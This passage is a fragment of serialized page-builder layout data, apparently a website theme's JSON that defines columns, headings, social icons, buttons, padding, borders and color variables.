\"182-c13\",\"182-c20\",\"182-c27\",\"182-c34\",\"182-c41\",\"182-c48\",\"182-c55\",\"182-c62\"]},{\"id\":515,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"15\"}}},\"v\":\"1.1\",\"nodes\":[\"182-c7\",\"182-c14\",\"182-c21\",\"182-c28\",\"182-c35\",\"182-c42\",\"182-c49\",\"182-c56\",\"182-c63\"]},{\"id\":516,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c8\",\"182-c15\",\"182-c22\",\"182-c29\",\"182-c36\",\"182-c43\",\"182-c50\",\"182-c57\",\"182-c64\"]},{\"id\":517,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"182-c9\",\"182-c16\",\"182-c23\",\"182-c30\",\"182-c37\",\"182-c44\",\"182-c51\",\"182-c58\",\"182-c65\"]},{\"id\":518,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"props\":{\"colorType\":\"custom\"},\"nodes\":[\"182-c10\",\"182-c24\",\"182-c45\",\"182-c52\",\"182-c59\",\"182-c66\"]},{\"id\":519,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c31\"]},{\"id\":520,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c17\"]},{\"id\":521,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c38\"]},{\"id\":522,\"props\":{\"layout\":{\"equalWidth\":false,\"equalHeight\":true},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c67\"]},{\"id\":523,\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"props\":{\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"v\":\"1.1\",\"nodes\":[\"182-c68\"]},{\"id\":524,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c69\"]},{\"id\":605,\"type\":\"hop-section\",\"props\":{\"showHeader\":true},\"v\":\"1.1\",\"nodes\":[\"182-c70\"]},{\"id\":606,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}},\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c71\"]},{\"id\":607,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"boxShadow\":{\"enabled\":false,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.1)\",\"blur\":\"3\",\"y\":\"1\",\"spread\":\"1\"}]},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"}},\"states\":{\"hover\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"20\",\"spread\":\"2\"}]},\"transition\":{\"duration\":{\"value\":\"0.5\"}},\"transform\":{\"translate\":{\"y\":{\"value\":\"-2\"}}}}},\"background\":{\"color\":\"${theme.colors.4}\"}},\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c72\",\"182-c79\",\"182-c86\",\"182-c93\",\"182-c100\",\"182-c117\",\"182-c123\"]},{\"id\":608,\"type\":\"hop-image\",\"v\":\"1.1\",\"nodes\":[\"182-c73\",\"182-c80\",\"182-c87\",\"182-c94\",\"182-c101\",\"182-c118\",\"182-c124\"]},{\"id\":609,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c74\",\"182-c81\",\"182-c88\",\"182-c95\",\"182-c102\",\"182-c119\",\"182-c125\"]},{\"id\":610,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"textAlign\":\"center\"},\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"15\"}},\"verticalAlign\":\"center\"},\"v\":\"1.1\",\"nodes\":[\"182-c75\",\"182-c82\",\"182-c89\",\"182-c96\",\"182-c103\",\"182-c120\",\"182-c126\"]},{\"id\":611,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c76\",\"182-c83\",\"182-c90\",\"182-c97\",\"182-c104\",\"182-c121\",\"182-c127\"]},{\"id\":612,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"182-c77\",\"182-c84\",\"182-c91\",\"182-c98\",\"182-c105\",\"182-c122\",\"182-c128\"]},{\"id\":613,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c78\",\"182-c85\",\"182-c92\",\"182-c99\",\"182-c106\",\"182-c129\"]},{\"id\":614,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c85\"]},{\"id\":615,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c92\"]},{\"id\":616,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c99\"]},{\"id\":617,\"props\":{\"layout\":{\"equalWidth\":false},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c135\"]},{\"id\":618,\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"props\":{\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"v\":\"1.1\",\"nodes\":[\"182-c136\"]},{\"id\":619,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c137\"]},{\"id\":620,\"type\":\"hop-section\",\"nodeId\":\"182-c96\",\"nodes\":[\"182-c96\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]},\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":623,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"182-c99\",\"nodes\":[\"182-c99\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":624,\"type\":\"hop-column\",\"nodeId\":\"182-c100\",\"nodes\":[\"182-c100\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":625,\"type\":\"hop-heading\",\"nodeId\":\"182-c101\",\"nodes\":[\"182-c101\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}},\"props\":{\"headerType\":\"2\"}},{\"id\":626,\"type\":\"hop-section\",\"props\":{\"showHeader\":true},\"style\":{\"background\":{\"color\":\"\"}},\"v\":\"1.1\",\"nodes\":[\"182-c145\"]},{\"id\":627,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}},\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c146\"]},{\"id\":628,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.1)\",\"blur\":\"3\",\"y\":\"1\",\"spread\":\"1\"}]},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}}},\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c159\",\"182-c166\"]},{\"id\":629,\"type\":\"hop-image\",\"v\":\"1.1\",\"nodes\":[\"182-c148\",\"182-c160\",\"182-c167\"]},{\"id\":630,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c149\",\"182-c161\",\"182-c168\"]},{\"id\":631,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"15\"}}},\"v\":\"1.1\",\"nodes\":[\"182-c150\",\"182-c162\",\"182-c169\"]},{\"id\":632,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c151\",\"182-c163\",\"182-c170\"]},{\"id\":633,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"182-c152\",\"182-c164\",\"182-c171\"]},{\"id\":634,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"props\":{\"colorType\":\"custom\"},\"nodes\":[\"182-c172\"]},{\"id\":635,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c165\"]},{\"id\":636,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c153\"]},{\"id\":637,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c201\"]},{\"id\":638,\"props\":{\"layout\":{\"equalWidth\":false},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c202\"]},{\"id\":639,\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"props\":{\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"v\":\"1.1\",\"nodes\":[\"182-c203\"]},{\"id\":640,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c204\"]},{\"id\":641,\"type\":\"hop-text\",\"props\":{\"type\":\"lead\"},\"v\":\"1.1\",\"nodes\":[\"182-c135\"]},{\"id\":642,\"type\":\"hop-content\",\"nodeId\":\"453-c1\",\"nodes\":[\"453-c1\"],\"v\":\"1.1\"},{\"id\":656,\"type\":\"hop-section\",\"props\":{\"showHeader\":false},\"style\":{\"background\":{\"color\":\"#F5FAFD\"}},\"v\":\"1.1\",\"nodes\":[\"453-c11\"]},{\"id\":657,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":1,\"horizontalGap\":2,\"verticalGap\":2,\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}},\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"453-c12\"]},{\"id\":658,\"type\":\"hop-column\",\"props\":{\"layout\":{\"verticalInnerGap\":2,\"horizontalInnerGap\":2,\"vSpace\":{\"path\":\"value\",\"value\":\"10\"}},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"v\":\"1.1\",\"nodes\":[\"453-c13\"]},{\"id\":659,\"type\":\"hop-icon\",\"style\":{\"descendants\":{\"icon\":{\"fill\":\"rgb(3, 169, 244)\",\"width\":{\"path\":\"value\",\"value\":\"24\"},\"height\":{\"path\":\"value\",\"value\":\"24\"}}}},\"v\":\"1.1\",\"nodes\":[\"453-c14\"]},{\"id\":660,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"453-c15\"]},{\"id\":661,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}},\"textAlign\":\"center\"},\"v\":\"1.1\",\"nodes\":[\"453-c16\"]},{\"id\":662,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"453-c17\"]},{\"id\":663,\"type\":\"hop-text\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}},\"media\":{\"desktop\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"453-c18\"]},{\"id\":668,\"type\":\"hop-section\",\"props\":{\"showHeader\":false,\"width\":\"full-width\"},\"v\":\"1.1\",\"nodes\":[\"453-c2\"],\"style\":{\"customHeight\":{\"min-height\":{\"unit\":\"px\",\"value\":362.2734375},\"type\":\"fit-to-content\"}}},{\"id\":669,\"props\":{\"layout\":{\"equalWidth\":true,\"verticalGap\":1,\"horizontalGap\":1,\"itemsPerRow\":1},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"453-c3\"]},{\"id\":670,\"type\":\"hop-column\",\"props\":{\"layout\":{\"verticalInnerGap\":0,\"horizontalInnerGap\":0},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}}},\"v\":\"1.1\",\"nodes\":[\"453-c4\"]},{\"id\":671,\"props\":{\"layout\":{\"equalWidth\":false,\"verticalGap\":1,\"horizontalGap\":1},\"media\":{\"mobile\":{\"layout\":{\"verticalGap\":2,\"horizontalGap\":0}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"453-c5\"]},{\"id\":672,\"type\":\"hop-column\",\"props\":{\"layout\":{\"verticalInnerGap\":0,\"horizontalInnerGap\":0},\"verticalAlign\":\"center\",\"media\":{\"mobile\":{\"layout\":{\"vSpace\":{\"path\":\"value\",\"value\":\"20\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}}},\"v\":\"1.1\",\"nodes\":[\"453-c6\"],\"style\":{\"textAlign\":\"center\"}},{\"id\":673,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"border\":{\"top\":{\"radius\":{\"right\":{\"path\":\"value\",\"value\":300},\"left\":{\"path\":\"value\",\"value\":300}},\"style\":\"solid\",\"color\":\"${theme.colors.0}\",\"width\":{\"path\":\"value\",\"value\":\"2\"}},\"bottom\":{\"radius\":{\"right\":{\"path\":\"value\",\"value\":300},\"left\":{\"path\":\"value\",\"value\":300}},\"style\":\"solid\",\"color\":\"${theme.colors.0}\",\"width\":{\"path\":\"value\",\"value\":\"2\"}},\"left\":{\"style\":\"solid\",\"color\":\"${theme.colors.0}\",\"width\":{\"path\":\"value\",\"value\":\"2\"}},\"right\":{\"style\":\"solid\",\"color\":\"${theme.colors.0}\",\"width\":{\"path\":\"value\",\"value\":\"2\"}}},\"width\":{\"path\":\"value\",\"value\":\"50\"},\"height\":{\"path\":\"value\",\"value\":\"50\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"background\":{\"image\":[{\"source\":{\"gradient\":{\"steps\":[{\"color\":\"rgb(0, 198, 251)\",\"position\":0},{\"color\":\"rgb(0, 91, 234)\"}],\"angle\":\"0\"}}}]},\"fill\":\"${theme.colors.4}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"path\":\"value\",\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"path\":\"value\",\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"path\":\"value\",\"value\":\"10\",\"unit\":\"px\"}}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"453-c7\"]},{\"id\":674,\"type\":\"hop-column\",\"style\":{\"textAlign\":\"left\",\"media\":{\"mobile\":{\"textAlign\":\"center\"}}},\"props\":{\"verticalAlign\":\"start\",\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"453-c8\"]},{\"id\":675,\"type\":\"hop-heading\",\"style\":{\"color\":\"${theme.colors.1}\",\"typography\":{\"color\":\"rgb(32, 42, 84)\"}},\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"453-c9\"]},{\"id\":676,\"type\":\"hop-text\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"color\":\"rgb(64, 85, 169)\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}}}}},\"v\":\"1.1\",\"nodes\":[\"453-c10\"]},{\"id\":677,\"type\":\"hop-button-group\",\"nodeId\":\"22-h37\",\"nodes\":[\"22-h29\"],\"v\":\"1.1\"},{\"id\":678,\"type\":\"hop-button\",\"nodeId\":\"22-h38\",\"nodes\":[\"22-h30\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"center\",\"background\":{\"color\":\"${theme.colors.0}\"},\"typography\":{\"color\":\"#fff\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"weight\":\"600\",\"lineHeight\":{\"value\":\"1\",\"unit\":\"\"},\"transform\":\"uppercase\",\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"}},\"border\":{\"top\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"bottom\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"right\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"12\"},\"bottom\":{\"unit\":\"px\",\"value\":\"12\"},\"left\":{\"unit\":\"px\",\"value\":\"24\"},\"right\":{\"unit\":\"px\",\"value\":\"24\"}},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0